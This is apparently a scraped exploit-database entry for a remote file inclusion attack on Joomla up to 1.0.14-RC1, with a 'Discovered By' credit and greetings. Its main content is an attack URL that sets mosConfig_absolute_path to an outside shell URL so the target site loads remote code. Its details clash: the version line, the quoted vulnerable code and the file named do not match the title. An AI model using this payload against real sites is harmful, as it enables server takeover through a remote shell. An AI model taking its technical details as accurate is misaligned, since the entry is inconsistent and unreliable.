Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

2008-02-1000:00:00

vulners.com

#==============================================================================================
#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Version : v2.3.1 & v2.3.0

#================================================================================================
#Bug in : Index.php

#Vlu Code :
#--------------------------------

include_once($config['path_src_include'] . "common.inc.php");

#================================================================================================

#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'
#--------------------------------

#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com

#================================================================================================
#Discoverd By : Fegla

#Conatact : alex_zooz_zooz[at]hotmail.com

#GreetZ : Sub-Code ,ShikaA , Wizard CC

==================================================================================================

JSON

Joomla &lt;= v1.0.14-RC1&#40;Index.php&#41; Remote File Inclusion Exploit

include_once($config['path_src_include'] . "common.inc.php");

Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit